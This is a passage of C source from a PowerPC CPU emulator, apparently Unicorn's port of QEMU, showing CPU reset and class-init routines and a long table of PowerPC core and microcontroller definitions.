CHECKED */ msr |= (target_ulong)0 << MSR_SA; /* TO BE CHECKED */ msr |= (target_ulong)1 << MSR_EP; #if defined(DO_SINGLE_STEP) && 0 /* Single step trace mode */ msr |= (target_ulong)1 << MSR_SE; msr |= (target_ulong)1 << MSR_BE; #endif #if defined(TARGET_PPC64) if (env->mmu_model & POWERPC_MMU_64) { msr |= (1ULL << MSR_SF); } #endif hreg_store_msr(env, msr, 1); env->nip = env->hreset_vector | env->excp_prefix; if (env->mmu_model != POWERPC_MMU_REAL) { ppc_tlb_invalidate_all(env); } hreg_compute_hflags(env); #ifdef _MSC_VER env->reserve_addr = (target_ulong)(0ULL - 1ULL); #else env->reserve_addr = (target_ulong)-1ULL; #endif /* Be sure no exception or interrupt is pending */ env->pending_interrupts = 0; s->exception_index = POWERPC_EXCP_NONE; env->error_code = 0; ppc_irq_reset(cpu); /* tininess for underflow is detected before rounding */ set_float_detect_tininess(float_tininess_before_rounding, &env->fp_status); for (i = 0; i < ARRAY_SIZE(env->spr_cb); i++) { ppc_spr_t *spr = &env->spr_cb[i]; if (!spr->name) { continue; } env->spr[i] = spr->default_value; } } #if 0 static bool ppc_cpu_is_big_endian(CPUState *cs) { PowerPCCPU *cpu = POWERPC_CPU(cs); CPUPPCState *env = &cpu->env; // cpu_synchronize_state(cs); return !msr_le; } #endif static void ppc_cpu_exec_enter(CPUState *cs) { #if 0 PowerPCCPU *cpu = POWERPC_CPU(cs); if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->cpu_exec_enter(cpu->vhyp, cpu); } #endif } static void ppc_cpu_exec_exit(CPUState *cs) { #if 0 PowerPCCPU *cpu = POWERPC_CPU(cs); if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->cpu_exec_exit(cpu->vhyp, cpu); } #endif } static void ppc_cpu_instance_init(struct uc_struct *uc, CPUState *obj) { PowerPCCPU *cpu = POWERPC_CPU(obj); PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); CPUPPCState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); cpu->vcpu_id = UNASSIGNED_CPU_INDEX; env->msr_mask = pcc->msr_mask; env->mmu_model = pcc->mmu_model; env->excp_model = pcc->excp_model; env->bus_model = pcc->bus_model; env->insns_flags = pcc->insns_flags; env->insns_flags2 = pcc->insns_flags2; env->flags = pcc->flags; env->check_pow = pcc->check_pow; /* * Mark HV mode as supported if the CPU has an MSR_HV bit in the * msr_mask. The mask can later be cleared by PAPR mode but the hv * mode support will remain, thus enforcing that we cannot use * priv. instructions in guest in PAPR mode. For 970 we currently * simply don't set HV in msr_mask thus simulating an "Apple mode" * 970. If we ever want to support 970 HV mode, we'll have to add * a processor attribute of some sort. */ env->has_hv_mode = !!(env->msr_mask & MSR_HVB); #ifdef TARGET_PPC64 ppc_hash64_init(cpu); #endif } void ppc_cpu_instance_finalize(CPUState *obj) { #ifdef TARGET_PPC64 PowerPCCPU *cpu = POWERPC_CPU(obj); ppc_hash64_finalize(cpu); #endif } static bool ppc_pvr_match_default(PowerPCCPUClass *pcc, uint32_t pvr) { return pcc->pvr == pvr; } static void ppc_cpu_class_init(struct uc_struct *uc, CPUClass *oc) { PowerPCCPUClass *pcc = POWERPC_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(oc); pcc->pvr_match = ppc_pvr_match_default; pcc->interrupts_big_endian = ppc_cpu_interrupts_big_endian_always; /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ pcc->parent_reset = cc->reset; /* overwrite the CPUClass->reset to arch reset: arm_cpu_reset(). */ cc->reset = ppc_cpu_reset; cc->has_work = ppc_cpu_has_work; cc->do_interrupt = ppc_cpu_do_interrupt; cc->cpu_exec_interrupt = ppc_cpu_exec_interrupt; cc->set_pc = ppc_cpu_set_pc; cc->do_unaligned_access = ppc_cpu_do_unaligned_access; cc->get_phys_page_debug = ppc_cpu_get_phys_page_debug; cc->tcg_initialize = ppc_translate_init; cc->tlb_fill_cpu = ppc_cpu_tlb_fill; cc->cpu_exec_enter = ppc_cpu_exec_enter; cc->cpu_exec_exit = ppc_cpu_exec_exit; } /* PowerPC CPU definitions from cpu-models.c*/ typedef struct PowerPCCPUInfo { const char *name; uint32_t pvr; uint32_t svr; void (*cpu_family_class_init)(CPUClass *oc, void *data); } PowerPCCPUInfo; #define POWERPC_DEF_SVR(_name, _desc, _pvr, _svr, _type) \ { _name, _pvr, _svr, POWERPC_FAMILY_NAME(_type) }, #define POWERPC_DEF(_name, _pvr, _type, _desc) \ POWERPC_DEF_SVR(_name, _desc, _pvr, POWERPC_SVR_NONE, _type) static const PowerPCCPUInfo ppc_cpus[] = { /* Embedded PowerPC */ /* PowerPC 401 family */ POWERPC_DEF("401", CPU_POWERPC_401, 401, "Generic PowerPC 401") /* PowerPC 401 cores */ POWERPC_DEF("401a1", CPU_POWERPC_401A1, 401, "PowerPC 401A1") POWERPC_DEF("401b2", CPU_POWERPC_401B2, 401x2, "PowerPC 401B2") POWERPC_DEF("401c2", CPU_POWERPC_401C2, 401x2, "PowerPC 401C2") POWERPC_DEF("401d2", CPU_POWERPC_401D2, 401x2, "PowerPC 401D2") POWERPC_DEF("401e2", CPU_POWERPC_401E2, 401x2, "PowerPC 401E2") POWERPC_DEF("401f2", CPU_POWERPC_401F2, 401x2, "PowerPC 401F2") /* XXX: to be checked */ POWERPC_DEF("401g2", CPU_POWERPC_401G2, 401x2, "PowerPC 401G2") /* PowerPC 401 microcontrollers */ POWERPC_DEF("iop480", CPU_POWERPC_IOP480, IOP480, "IOP480 (401 microcontroller)") POWERPC_DEF("cobra", CPU_POWERPC_COBRA, 401, "IBM Processor for Network Resources") /* PowerPC 403 family */ /* PowerPC 403 microcontrollers */ POWERPC_DEF("403ga", CPU_POWERPC_403GA, 403, "PowerPC 403 GA") POWERPC_DEF("403gb", CPU_POWERPC_403GB, 403, "PowerPC 403 GB") POWERPC_DEF("403gc", CPU_POWERPC_403GC, 403, "PowerPC 403 GC") POWERPC_DEF("403gcx", CPU_POWERPC_403GCX, 403GCX, "PowerPC 403 GCX") /* PowerPC 405 family */ /* PowerPC 405 cores */ POWERPC_DEF("405d2", CPU_POWERPC_405D2, 405, "PowerPC 405 D2") POWERPC_DEF("405d4", CPU_POWERPC_405D4, 405, "PowerPC 405 D4") /* PowerPC 405 microcontrollers */ POWERPC_DEF("405cra", CPU_POWERPC_405CRa, 405, "PowerPC 405 CRa") POWERPC_DEF("405crb", CPU_POWERPC_405CRb, 405, "PowerPC 405 CRb") POWERPC_DEF("405crc", CPU_POWERPC_405CRc, 405, "PowerPC 405 CRc") POWERPC_DEF("405ep", CPU_POWERPC_405EP, 405, "PowerPC 405 EP") POWERPC_DEF("405ez", CPU_POWERPC_405EZ, 405, "PowerPC 405 EZ") POWERPC_DEF("405gpa", CPU_POWERPC_405GPa, 405, "PowerPC 405 GPa") POWERPC_DEF("405gpb", CPU_POWERPC_405GPb, 405, "PowerPC 405 GPb") POWERPC_DEF("405gpc", CPU_POWERPC_405GPc, 405, "PowerPC 405 GPc") POWERPC_DEF("405gpd", CPU_POWERPC_405GPd, 405, "PowerPC 405 GPd") POWERPC_DEF("405gpr", CPU_POWERPC_405GPR, 405, "PowerPC 405 GPR") POWERPC_DEF("405lp", CPU_POWERPC_405LP, 405, "PowerPC 405 LP") POWERPC_DEF("npe405h", CPU_POWERPC_NPE405H, 405, "Npe405 H") POWERPC_DEF("npe405h2", CPU_POWERPC_NPE405H2, 405, "Npe405 H2") POWERPC_DEF("npe405l", CPU_POWERPC_NPE405L, 405, "Npe405 L") POWERPC_DEF("npe4gs3", CPU_POWERPC_NPE4GS3, 405, "Npe4GS3") /* PowerPC 401/403/405 based set-top-box microcontrollers */ POWERPC_DEF("stb03", CPU_POWERPC_STB03, 405, "STB03xx") POWERPC_DEF("stb04", CPU_POWERPC_STB04, 405, "STB04xx") POWERPC_DEF("stb25", CPU_POWERPC_STB25, 405, "STB25xx") /* Xilinx PowerPC 405 cores */ POWERPC_DEF("x2vp4", CPU_POWERPC_X2VP4, 405, NULL) POWERPC_DEF("x2vp20", CPU_POWERPC_X2VP20, 405, NULL) /* PowerPC 440 family */ #if defined(TODO_USER_ONLY) POWERPC_DEF("440", CPU_POWERPC_440, 440GP, "Generic PowerPC 440") #endif /* PowerPC 440 cores */ POWERPC_DEF("440-xilinx", CPU_POWERPC_440_XILINX, 440x5, "PowerPC 440 Xilinx 5") POWERPC_DEF("440-xilinx-w-dfpu", CPU_POWERPC_440_XILINX, 440x5wDFPU, "PowerPC 440 Xilinx 5 With a Double Prec. FPU") /* PowerPC 440 microcontrollers */ POWERPC_DEF("440epa", CPU_POWERPC_440EPa, 440EP, "PowerPC 440 EPa") POWERPC_DEF("440epb", CPU_POWERPC_440EPb, 440EP, "PowerPC 440 EPb") POWERPC_DEF("440epx", CPU_POWERPC_440EPX, 440EP, "PowerPC 440 EPX") POWERPC_DEF("460exb", CPU_POWERPC_460EXb, 460EX, "PowerPC 460 EXb") #if defined(TODO_USER_ONLY) POWERPC_DEF("440gpb", CPU_POWERPC_440GPb, 440GP, "PowerPC 440 GPb") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gpc", CPU_POWERPC_440GPc, 440GP, "PowerPC 440 GPc") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gra", CPU_POWERPC_440GRa, 440x5, "PowerPC 440 GRa") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440grx", CPU_POWERPC_440GRX, 440x5, "PowerPC 440 GRX") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxa", CPU_POWERPC_440GXa, 440EP, "PowerPC 440 GXa") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxb", CPU_POWERPC_440GXb, 440EP, "PowerPC 440 GXb") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxc", CPU_POWERPC_440GXc, 440EP, "PowerPC 440 GXc") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440gxf", CPU_POWERPC_440GXf, 440EP, "PowerPC 440 GXf") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440sp", CPU_POWERPC_440SP, 440EP, "PowerPC 440 SP") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440sp2", CPU_POWERPC_440SP2, 440EP, "PowerPC 440 SP2") #endif #if defined(TODO_USER_ONLY) POWERPC_DEF("440spe", CPU_POWERPC_440SPE, 440EP, "PowerPC 440 SPE") #endif /* Freescale embedded PowerPC cores */ /* MPC5xx family (aka RCPU) */ #if defined(TODO_USER_ONLY) POWERPC_DEF("mpc5xx", CPU_POWERPC_MPC5xx, MPC5xx, "Generic MPC5xx core") #endif /* MPC8xx family (aka PowerQUICC) */ #if defined(TODO_USER_ONLY) POWERPC_DEF("mpc8xx", CPU_POWERPC_MPC8xx, MPC8xx, "Generic MPC8xx core") #endif /* MPC82xx family (aka PowerQUICC-II) */ POWERPC_DEF("g2", CPU_POWERPC_G2, G2, "PowerPC G2 core") POWERPC_DEF("g2h4", CPU_POWERPC_G2H4, G2, "PowerPC G2 H4 core") POWERPC_DEF("g2gp", CPU_POWERPC_G2gp, G2, "PowerPC G2 GP core") POWERPC_DEF("g2ls", CPU_POWERPC_G2ls, G2, "PowerPC G2 LS core") POWERPC_DEF("g2hip3", CPU_POWERPC_G2_HIP3, G2, "PowerPC G2 HiP3 core") POWERPC_DEF("g2hip4", CPU_POWERPC_G2_HIP4, G2, "PowerPC G2 HiP4 core") POWERPC_DEF("mpc603", CPU_POWERPC_MPC603, 603E, "PowerPC MPC603 core") POWERPC_DEF("g2le", CPU_POWERPC_G2LE, G2LE, "PowerPC G2le core (same as G2 plus little-endian mode support)") POWERPC_DEF("g2legp", CPU_POWERPC_G2LEgp, G2LE, "PowerPC G2LE GP core") POWERPC_DEF("g2lels", CPU_POWERPC_G2LEls, G2LE, "PowerPC G2LE LS core") POWERPC_DEF("g2legp1", CPU_POWERPC_G2LEgp1, G2LE, "PowerPC G2LE GP1 core") POWERPC_DEF("g2legp3", CPU_POWERPC_G2LEgp3, G2LE, "PowerPC G2LE GP3 core") /* PowerPC G2 microcontrollers */ POWERPC_DEF_SVR("mpc5200_v10", "MPC5200 v1.0", CPU_POWERPC_MPC5200_v10, POWERPC_SVR_5200_v10, G2LE) POWERPC_DEF_SVR("mpc5200_v11", "MPC5200 v1.1", CPU_POWERPC_MPC5200_v11, POWERPC_SVR_5200_v11, G2LE) POWERPC_DEF_SVR("mpc5200_v12", "MPC5200 v1.2", CPU_POWERPC_MPC5200_v12, POWERPC_SVR_5200_v12, G2LE) POWERPC_DEF_SVR("mpc5200b_v20", "MPC5200B v2.0", CPU_POWERPC_MPC5200B_v20, POWERPC_SVR_5200B_v20, G2LE) POWERPC_DEF_SVR("mpc5200b_v21", "MPC5200B v2.1", CPU_POWERPC_MPC5200B_v21, POWERPC_SVR_5200B_v21, G2LE) /* e200 family */ POWERPC_DEF("e200z5", CPU_POWERPC_e200z5, e200, "PowerPC e200z5 core") POWERPC_DEF("e200z6", CPU_POWERPC_e200z6, e200, "PowerPC e200z6 core") /* e300 family */ POWERPC_DEF("e300c1", CPU_POWERPC_e300c1, e300, "PowerPC e300c1 core") POWERPC_DEF("e300c2", CPU_POWERPC_e300c2, e300, "PowerPC e300c2 core") POWERPC_DEF("e300c3", CPU_POWERPC_e300c3, e300, "PowerPC e300c3 core") POWERPC_DEF("e300c4", CPU_POWERPC_e300c4, e300, "PowerPC e300c4 core") /* PowerPC e300 microcontrollers */ POWERPC_DEF_SVR("mpc8343", "MPC8343", CPU_POWERPC_MPC834x, POWERPC_SVR_8343, e300) POWERPC_DEF_SVR("mpc8343a", "MPC8343A", CPU_POWERPC_MPC834x, POWERPC_SVR_8343A, e300) POWERPC_DEF_SVR("mpc8343e", "MPC8343E", CPU_POWERPC_MPC834x, POWERPC_SVR_8343E, e300) POWERPC_DEF_SVR("mpc8343ea", "MPC8343EA", CPU_POWERPC_MPC834x, POWERPC_SVR_8343EA, e300) POWERPC_DEF_SVR("mpc8347t", "MPC8347T", CPU_POWERPC_MPC834x, POWERPC_SVR_8347T, e300) POWERPC_DEF_SVR("mpc8347p", "MPC8347P", CPU_POWERPC_MPC834x, POWERPC_SVR_8347P, e300) POWERPC_DEF_SVR("mpc8347at", "MPC8347AT", CPU_POWERPC_MPC834x, POWERPC_SVR_8347AT, e300) POWERPC_DEF_SVR("mpc8347ap", "MPC8347AP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347AP, e300) POWERPC_DEF_SVR("mpc8347et", "MPC8347ET", CPU_POWERPC_MPC834x, POWERPC_SVR_8347ET, e300) POWERPC_DEF_SVR("mpc8347ep", "MPC8343EP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EP, e300) POWERPC_DEF_SVR("mpc8347eat", "MPC8347EAT", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EAT, e300) POWERPC_DEF_SVR("mpc8347eap", "MPC8343EAP", CPU_POWERPC_MPC834x, POWERPC_SVR_8347EAP, e300) POWERPC_DEF_SVR("mpc8349", "MPC8349", CPU_POWERPC_MPC834x, POWERPC_SVR_8349, e300) POWERPC_DEF_SVR("mpc8349a", "MPC8349A", CPU_POWERPC_MPC834x, POWERPC_SVR_8349A, e300) POWERPC_DEF_SVR("mpc8349e", "MPC8349E", CPU_POWERPC_MPC834x, POWERPC_SVR_8349E, e300) POWERPC_DEF_SVR("mpc8349ea", "MPC8349EA", CPU_POWERPC_MPC834x, POWERPC_SVR_8349EA, e300) POWERPC_DEF_SVR("mpc8377", "MPC8377", CPU_POWERPC_MPC837x, POWERPC_SVR_8377, e300) POWERPC_DEF_SVR("mpc8377e", "MPC8377E", CPU_POWERPC_MPC837x, POWERPC_SVR_8377E, e300) POWERPC_DEF_SVR("mpc8378", "MPC8378", CPU_POWERPC_MPC837x, POWERPC_SVR_8378, e300) POWERPC_DEF_SVR("mpc8378e", "MPC8378E", CPU_POWERPC_MPC837x, POWERPC_SVR_8378E, e300) POWERPC_DEF_SVR("mpc8379", "MPC8379", CPU_POWERPC_MPC837x, POWERPC_SVR_8379, e300) POWERPC_DEF_SVR("mpc8379e", "MPC8379E", CPU_POWERPC_MPC837x, POWERPC_SVR_8379E, e300) /* e500 family */ POWERPC_DEF_SVR("e500_v10", "PowerPC e500 v1.0 core", CPU_POWERPC_e500v1_v10, POWERPC_SVR_E500, e500v1) POWERPC_DEF_SVR("e500_v20", "PowerPC e500 v2.0 core", CPU_POWERPC_e500v1_v20, POWERPC_SVR_E500, e500v1) POWERPC_DEF_SVR("e500v2_v10", "PowerPC e500v2 v1.0 core", CPU_POWERPC_e500v2_v10, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500v2_v20", "PowerPC e500v2 v2.0 core", CPU_POWERPC_e500v2_v20, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500v2_v21", "PowerPC e500v2 v2.1 core", CPU_POWERPC_e500v2_v21, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500v2_v22", "PowerPC e500v2 v2.2 core", CPU_POWERPC_e500v2_v22, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500v2_v30", "PowerPC e500v2 v3.0 core", CPU_POWERPC_e500v2_v30, POWERPC_SVR_E500, e500v2) POWERPC_DEF_SVR("e500mc", "e500mc", CPU_POWERPC_e500mc, POWERPC_SVR_E500, e500mc) /* PowerPC e500 microcontrollers */ POWERPC_DEF_SVR("mpc8533_v10", "MPC8533 v1.0", CPU_POWERPC_MPC8533_v10, POWERPC_SVR_8533_v10, e500v2) POWERPC_DEF_SVR("mpc8533_v11", "MPC8533 v1.1", CPU_POWERPC_MPC8533_v11, POWERPC_SVR_8533_v11, e500v2) POWERPC_DEF_SVR("mpc8533e_v10", "MPC8533E v1.0", CPU_POWERPC_MPC8533E_v10, POWERPC_SVR_8533E_v10, e500v2) POWERPC_DEF_SVR("mpc8533e_v11", "MPC8533E v1.1", CPU_POWERPC_MPC8533E_v11, POWERPC_SVR_8533E_v11, e500v2) POWERPC_DEF_SVR("mpc8540_v10", "MPC8540 v1.0", CPU_POWERPC_MPC8540_v10, POWERPC_SVR_8540_v10, e500v1) POWERPC_DEF_SVR("mpc8540_v20", "MPC8540 v2.0", CPU_POWERPC_MPC8540_v20, POWERPC_SVR_8540_v20, e500v1) POWERPC_DEF_SVR("mpc8540_v21", "MPC8540 v2.1", CPU_POWERPC_MPC8540_v21, POWERPC_SVR_8540_v21, e500v1) POWERPC_DEF_SVR("mpc8541_v10", "MPC8541 v1.0", CPU_POWERPC_MPC8541_v10, POWERPC_SVR_8541_v10, e500v1) POWERPC_DEF_SVR("mpc8541_v11", "MPC8541 v1.1", CPU_POWERPC_MPC8541_v11, POWERPC_SVR_8541_v11, e500v1) POWERPC_DEF_SVR("mpc8541e_v10", "MPC8541E v1.0", CPU_POWERPC_MPC8541E_v10, POWERPC_SVR_8541E_v10, e500v1) POWERPC_DEF_SVR("mpc8541e_v11", "MPC8541E v1.1", CPU_POWERPC_MPC8541E_v11, POWERPC_SVR_8541E_v11, e500v1) POWERPC_DEF_SVR("mpc8543_v10", "MPC8543 v1.0", CPU_POWERPC_MPC8543_v10, POWERPC_SVR_8543_v10, e500v2) POWERPC_DEF_SVR("mpc8543_v11", "MPC8543 v1.1", CPU_POWERPC_MPC8543_v11, POWERPC_SVR_8543_v11, e500v2) POWERPC_DEF_SVR("mpc8543_v20", "MPC8543 v2.0", CPU_POWERPC_MPC8543_v20, POWERPC_SVR_8543_v20, e500v2) POWERPC_DEF_SVR("mpc8543_v21", "MPC8543 v2.1", CPU_POWERPC_MPC8543_v21, POWERPC_SVR_8543_v21, e500v2) POWERPC_DEF_SVR("mpc8543e_v10", "MPC8543E v1.0", CPU_POWERPC_MPC8543E_v10, POWERPC_SVR_8543E_v10, e500v2) POWERPC_DEF_SVR("mpc8543e_v11", "MPC8543E v1.1", CPU_POWERPC_MPC8543E_v11, POWERPC_SVR_8543E_v11, e500v2) POWERPC_DEF_SVR("mpc8543e_v20", "MPC8543E v2.0", CPU_POWERPC_MPC8543E_v20, POWERPC_SVR_8543E_v20, e500v2) POWERPC_DEF_SVR("mpc8543e_v21", "MPC8543E v2.1", CPU_POWERPC_MPC8543E_v21, POWERPC_SVR_8543E_v21, e500v2) POWERPC_DEF_SVR("mpc8544_v10", "MPC8544 v1.0", CPU_POWERPC_MPC8544_v10, POWERPC_SVR_8544_v10, e500v2) POWERPC_DEF_SVR("mpc8544_v11", "MPC8544 v1.1", CPU_POWERPC_MPC8544_v11, POWERPC_SVR_8544_v11, e500v2) POWERPC_DEF_SVR("mpc8544e_v10", "MPC8544E v1.0", CPU_POWERPC_MPC8544E_v10, POWERPC_SVR_8544E_v10, e500v2) POWERPC_DEF_SVR("mpc8544e_v11", "MPC8544E v1.1", CPU_POWERPC_MPC8544E_v11, POWERPC_SVR_8544E_v11, e500v2) POWERPC_DEF_SVR("mpc8545_v20", "MPC8545 v2.0", CPU_POWERPC_MPC8545_v20, POWERPC_SVR_8545_v20, e500v2) POWERPC_DEF_SVR("mpc8545_v21", "MPC8545 v2.1", CPU_POWERPC_MPC8545_v21, POWERPC_SVR_8545_v21, e500v2) POWERPC_DEF_SVR("mpc8545e_v20", "MPC8545E v2.0", CPU_POWERPC_MPC8545E_v20, POWERPC_SVR_8545E_v20, e500v2) POWERPC_DEF_SVR("mpc8545e_v21", "MPC8545E v2.1", CPU_POWERPC_MPC8545E_v21, POWERPC_SVR_8545E_v21, e500v2) POWERPC_DEF_SVR("mpc8547e_v20", "MPC8547E v2.0", CPU_POWERPC_MPC8547E_v20, POWERPC_SVR_8547E_v20, e500v2) POWERPC_DEF_SVR("mpc8547e_v21", "MPC8547E v2.1", CPU_POWERPC_MPC8547E_v21, POWERPC_SVR_8547E_v21, e500v2) POWERPC_DEF_SVR("mpc8548_v10", "MPC8548 v1.0", CPU_POWERPC_MPC8548_v10, POWERPC_SVR_8548_v10, e500v2) POWERPC_DEF_SVR("mpc8548_v11", "MPC8548 v1.1", CPU_POWERPC_MPC8548_v11, POWERPC_SVR_8548_v11, e500v2) POWERPC_DEF_SVR("mpc8548_v20", "MPC8548 v2.0", CPU_POWERPC_MPC8548_v20, POWERPC_SVR_8548_v20, e500v2) POWERPC_DEF_SVR("mpc8548_v21", "MPC8548 v2.1", CPU_POWERPC_MPC8548_v21, POWERPC_SVR_8548_v21, e500v2) POWERPC_DEF_SVR("mpc8548e_v10", "MPC8548E v1.0", CPU_POWERPC_MPC8548E_v10, POWERPC_SVR_8548E_v10, e500v2) POWERPC_DEF_SVR("mpc8548e_v11", "MPC8548E v1.1", CPU_POWERPC_MPC8548E_v11, POWERPC_SVR_8548E_v11, e500v2) POWERPC_DEF_SVR("mpc8548e_v20", "MPC8548E v2.0", CPU_POWERPC_MPC8548E_v20, POWERPC_SVR_8548E_v20, e500v2) POWERPC_DEF_SVR("mpc8548e_v21", "MPC8548E v2.1", CPU_POWERPC_MPC8548E_v21, POWERPC_SVR_8548E_v21, e500v2) POWERPC_DEF_SVR("mpc8555_v10", "MPC8555 v1.0", CPU_POWERPC_MPC8555_v10, POWERPC_SVR_8555_v10, e500v2) POWERPC_DEF_SVR("mpc8555_v11", "MPC8555 v1.1", CPU_POWERPC_MPC8555_v11, POWERPC_SVR_8555_v11, e500v2) POWERPC_DEF_SVR("mpc8555e_v10", "MPC8555E v1.0", CPU_POWERPC_MPC8555E_v10, POWERPC_SVR_8555E_v10, e500v2) POWERPC_DEF_SVR("mpc8555e_v11", "MPC8555E v1.1", CPU_POWERPC_MPC8555E_v11, POWERPC_SVR_8555E_v11, e500v2) POWERPC_DEF_SVR("mpc8560_v10", "MPC8560 v1.0", CPU_POWERPC_MPC8560_v10, POWERPC_SVR_8560_v10, e500v2) POWERPC_DEF_SVR("mpc8560_v20", "MPC8560 v2.0", CPU_POWERPC_MPC8560_v20, POWERPC_SVR_8560_v20, e500v2) POWERPC_DEF_SVR("mpc8560_v21", "MPC8560 v2.1", CPU_POWERPC_MPC8560_v21, POWERPC_SVR_8560_v21, e500v2) POWERPC_DEF_SVR("mpc8567", "MPC8567", CPU_POWERPC_MPC8567, POWERPC_SVR_8567, e500v2) POWERPC_DEF_SVR("mpc8567e", "MPC8567E", CPU_POWERPC_MPC8567E, POWERPC_SVR_8567E, e500v2) POWERPC_DEF_SVR("mpc8568", "MPC8568", CPU_POWERPC_MPC8568, POWERPC_SVR_8568, e500v2) POWERPC_DEF_SVR("mpc8568e", "MPC8568E", CPU_POWERPC_MPC8568E, POWERPC_SVR_8568E, e500v2) POWERPC_DEF_SVR("mpc8572", "MPC8572", CPU_POWERPC_MPC8572, POWERPC_SVR_8572, e500v2) POWERPC_DEF_SVR("mpc8572e", "MPC8572E", CPU_POWERPC_MPC8572E, POWERPC_SVR_8572E, e500v2) /* e600 family */ POWERPC_DEF("e600", CPU_POWERPC_e600, e600, "PowerPC e600 core") /* PowerPC e600 microcontrollers */ POWERPC_DEF_SVR("mpc8610", "MPC8610", CPU_POWERPC_MPC8610, POWERPC_SVR_8610, e600) POWERPC_DEF_SVR("mpc8641", "MPC8641", CPU_POWERPC_MPC8641, POWERPC_SVR_8641, e600) POWERPC_DEF_SVR("mpc8641d", "MPC8641D", CPU_POWERPC_MPC8641D, POWERPC_SVR_8641D, e600) /* 32 bits "classic" PowerPC */ /* PowerPC 6xx family */ POWERPC_DEF("601_v0", CPU_POWERPC_601_v0, 601, "PowerPC 601v0") POWERPC_DEF("601_v1", CPU_POWERPC_601_v1, 601, "PowerPC 601v1") POWERPC_DEF("601_v2", CPU_POWERPC_601_v2, 601v, "PowerPC 601v2") POWERPC_DEF("602", CPU_POWERPC_602, 602, "PowerPC 602") POWERPC_DEF("603", CPU_POWERPC_603, 603, "PowerPC 603") POWERPC_DEF("603e_v1.1", CPU_POWERPC_603E_v11, 603E, "PowerPC 603e v1.1") POWERPC_DEF("603e_v1.2", CPU_POWERPC_603E_v12, 603E, "PowerPC 603e v1.2") POWERPC_DEF("603e_v1.3", CPU_POWERPC_603E_v13, 603E, "PowerPC 603e v1.3") POWERPC_DEF("603e_v1.4", CPU_POWERPC_603E_v14, 603E, "PowerPC 603e v1.4") POWERPC_DEF("603e_v2.2", CPU_POWERPC_603E_v22, 603E, "PowerPC 603e v2.2") POWERPC_DEF("603e_v3", CPU_POWERPC_603E_v3, 603E, "PowerPC 603e v3") POWERPC_DEF("603e_v4", CPU_POWERPC_603E_v4, 603E, "PowerPC 603e v4") POWERPC_DEF("603e_v4.1", CPU_POWERPC_603E_v41, 603E, "PowerPC 603e v4.1") POWERPC_DEF("603e7", CPU_POWERPC_603E7, 603E, "PowerPC 603e (aka PID7)") POWERPC_DEF("603e7t", CPU_POWERPC_603E7t, 603E, "PowerPC 603e7t") POWERPC_DEF("603e7v", CPU_POWERPC_603E7v, 603E, "PowerPC 603e7v") POWERPC_DEF("603e7v1", CPU_POWERPC_603E7v1, 603E, "PowerPC 603e7v1") POWERPC_DEF("603e7v2", CPU_POWERPC_603E7v2, 603E, "PowerPC 603e7v2") POWERPC_DEF("603p", CPU_POWERPC_603P, 603E, "PowerPC 603p (aka PID7v)") POWERPC_DEF("604", CPU_POWERPC_604, 604, "PowerPC 604") POWERPC_DEF("604e_v1.0", CPU_POWERPC_604E_v10, 604E, "PowerPC 604e v1.0") POWERPC_DEF("604e_v2.2", CPU_POWERPC_604E_v22, 604E, "PowerPC 604e v2.2") POWERPC_DEF("604e_v2.4", CPU_POWERPC_604E_v24, 604E, "PowerPC 604e v2.4") POWERPC_DEF("604r", CPU_POWERPC_604R, 604E, "PowerPC 604r (aka PIDA)") /* PowerPC 7xx family */ POWERPC_DEF("740_v1.0", CPU_POWERPC_7x0_v10, 740, "PowerPC 740 v1.0 (G3)") POWERPC_DEF("750_v1.0", CPU_POWERPC_7x0_v10, 750, "PowerPC 750 v1.0 (G3)") POWERPC_DEF("740_v2.0", CPU_POWERPC_7x0_v20, 740, "PowerPC 740 v2.0 (G3)") POWERPC_DEF("750_v2.0", CPU_POWERPC_7x0_v20, 750, "PowerPC 750 v2.0 (G3)") POWERPC_DEF("740_v2.1", CPU_POWERPC_7x0_v21, 740, "PowerPC 740 v2.1 (G3)") POWERPC_DEF("750_v2.1", CPU_POWERPC_7x0_v21, 750, "PowerPC 750 v2.1 (G3)") POWERPC_DEF("740_v2.2", CPU_POWERPC_7x0_v22, 740, "PowerPC 740 v2.2 (G3)") POWERPC_DEF("750_v2.2", CPU_POWERPC_7x0_v22, 750, "PowerPC 750 v2.2 (G3)") POWERPC_DEF("740_v3.0", CPU_POWERPC_7x0_v30, 740, "PowerPC 740 v3.0 (G3)") POWERPC_DEF("750_v3.0", CPU_POWERPC_7x0_v30, 750, "PowerPC 750 v3.0 (G3)") POWERPC_DEF("740_v3.1", CPU_POWERPC_7x0_v31, 740, "PowerPC 740 v3.1 (G3)") POWERPC_DEF("750_v3.1", CPU_POWERPC_7x0_v31, 750, "PowerPC 750 v3.1 (G3)") POWERPC_DEF("740e", CPU_POWERPC_740E, 740, "PowerPC 740E (G3)") POWERPC_DEF("750e", CPU_POWERPC_750E, 750, "PowerPC 750E (G3)") POWERPC_DEF("740p", CPU_POWERPC_7x0P, 740, "PowerPC 740P (G3)") POWERPC_DEF("750p", CPU_POWERPC_7x0P, 750, "PowerPC 750P (G3)") POWERPC_DEF("750cl_v1.0", CPU_POWERPC_750CL_v10, 750cl, "PowerPC 750CL v1.0") POWERPC_DEF("750cl_v2.0", 